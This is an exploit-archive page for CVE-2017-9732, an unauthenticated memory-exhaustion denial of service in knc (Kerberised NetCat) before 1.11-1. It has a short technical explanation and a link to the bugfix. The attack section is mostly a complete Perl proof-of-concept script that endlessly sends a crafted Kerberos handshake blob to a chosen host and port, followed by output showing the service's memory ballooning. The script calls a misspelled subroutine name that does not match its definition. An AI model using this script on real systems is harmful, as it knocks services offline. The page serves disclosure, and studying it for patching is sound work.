knc (Kerberized NetCat) Denial Of Service

knc (Kerberized NetCat) Denial Of Service: Posted Nov 29, 2018; Authored by Imre Rad; knc (Kerberised NetCat) versions before 1.11-1 are vulnerable to denial of service (memory exhaustion) that can be exploited remotely without authentication, possibly affecting another service running on the targeted host. Proof of concept included.; tags | exploit, denial of service, proof of concept; advisories | CVE-2017-9732; SHA-256 | 5f21249af2b570413ccedbc2d38d69f7569143fd0ffd8e6431e4db2f29a7fb53; Download | Favorite | View

knc (Kerberized NetCat) Denial Of Service

# Product
"KNC is Kerberised NetCat. It works in basically the same way as either netcat or stunnel except that it is uses GSS-API to secure the communication. You can use it to construct client/server applications while keeping the Kerberos libraries out of your programs address space quickly and easily."

## Links
Official page:
http://oskt.secure-endpoints.com/knc.html
Source code repository:
https://github.com/elric1/knc/

## CVE-2017-9732 vulnerability
knc (Kerberised NetCat) before 1.11-1 is vulnerable to denial of service (memory exhaustion) that can be exploited remotely without authentication, possibly affecting another services running on the targeted host.

The knc implementation uses a temporary buffer in read_packet() function that is not freed (memory leak). An unauthenticated attacker can abuse this by sending a blob of valid kerberos handshake structure but with unexpected type; instead of token type AP_REQ (0x0100) I sent 0x0000 at bytes 16 and 17 in my proof of concept. During the attack, gss_sec_accept_context returns G_CONTINUE_NEEDED and the memory is exhausted in the long run.

The attack might not even be logged, depending on how the Open Source Kerberos Tooling stack is configured.

## Exploit

```
./memory-exhaustion-poc.pl target-host target-port
```

Top output ~30 seconds later:

```
2 CPUs;  last pid: 20507;  load averages:  1.26,  0.84,  0.38                                                                                                   14:11:53

268 processes: 4 running, 264 sleeping

CPU states: 38.6% user,  0.0% nice, 27.1% system, 34.3% idle

     cpu 0: 18.7% user,  0.0% nice, 22.9% system, 58.4% idle

     cpu 1: 54.7% user,  0.0% nice, 30.7% system, 14.6% idle

Memory: 7857M real, 7734M used, 122M free  Swap: 4094M total, 0K used, 4094M free

 

  PID  PSID USERNAME   THR PRI NICE  SIZE   RES STATE   TIME     CPU COMMAND

20156 19806 username     1  20    0 2165M 2133M cpu1   19:41  46.19% knc
...
```



## Bugfix
https://github.com/elric1/knc/commit/f237f3e09ecbaf59c897f5046538a7b1a3fa40c1


## Proof of concept
# memory-exhaustion-poc.pl

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket::INET;

my $host = shift @ARGV || "127.0.0.1";
my $port = shift @ARGV || 2666;

my $sock = IO::Socket::INET->new(PeerPort => $port, PeerAddr => $host) or die "Cant connect: $@\n";
$sock->autoflush();

my $data = pack("H*", without_spaces("
 60 82 02 32 06 09 2a 86 48 86 f7 12 01 02 02 00
 00 6e 82 02 21 30 82 02 1d a0 03 02 01 05 a1 03
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 
"));

while(1){
  send_with_lenght_prefix($data);
}

sub send_with_length_prefix {
  my $d = shift;
  do_send(pack("N", length($d)));
  do_send($d);
}

sub do_send {
  my $d = shift;
  printf STDERR ">> %s\n", unpack("H*", $d);
  print $sock $d or die "Cant write: $!";  
}

sub without_spaces {
  my $d = shift;
  $d =~ s/\s*//g;
  return $d;
}

Top Authors In Last 30 Days

Red Hat 254 files
Ubuntu 59 files
LiquidWorm 28 files
indoushka 20 files
Debian 19 files
Apple 10 files
Google Security Research 7 files
Chokri Hammedi 3 files
Jann Horn 3 files
Emiliano Febbi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,154)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,754)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,190)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,958)
UNIX (9,473)
UnixWare (188)
Windows (6,784)
Other

knc (Kerberized NetCat) Denial Of Service

knc (Kerberized NetCat) Denial Of Service

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

knc (Kerberized NetCat) Denial Of Service

Share This

knc (Kerberized NetCat) Denial Of Service

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems